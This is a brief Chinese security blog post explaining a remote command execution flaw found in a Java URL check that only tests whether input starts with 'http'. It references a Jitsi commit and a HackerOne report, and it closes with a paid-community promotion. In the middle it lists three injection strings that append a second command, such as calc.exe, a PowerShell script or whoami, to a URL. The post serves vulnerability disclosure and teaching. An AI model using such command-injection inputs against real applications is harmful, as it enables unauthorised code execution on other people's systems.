白盒审计出的一个RCE

· 2026-07-02 12:00 · 3 阅读

原创 h1 2026-07-02 12:00 江苏

正文出问题的代码:if (url == null || !

正文

出问题的代码:

if (url == null || !url.startsWith("http"))
{
    logger.warn("Not a valid URL to open:" + url);
return;
}

URL 校验这里有问题:

!url.startsWith("http")

攻击者可以传入类似如下代码:

http://evil.com & calc.exe
http://example.com && powershell evil.ps1
http://x" && cmd /c whoami

如果你是一个长期主义者,欢迎加入我的知识星球,本星球日日更新,包含号主大量一线实战,全网独一无二,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

如何利用ai辅助挖漏洞

如何在移动端抓包-下

如何绕过签名校验

一款bp神器

挖掘有回显ssrf的隐藏payload

ssrf绕过新思路

一个辅助测试ssrf的工具

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

参考

https://github.com/jitsi/jitsi/commit/8aa7be58522f4264078d54752aae5483bfd854b2

https://hackerone.com/reports/1692603

跳转微信打开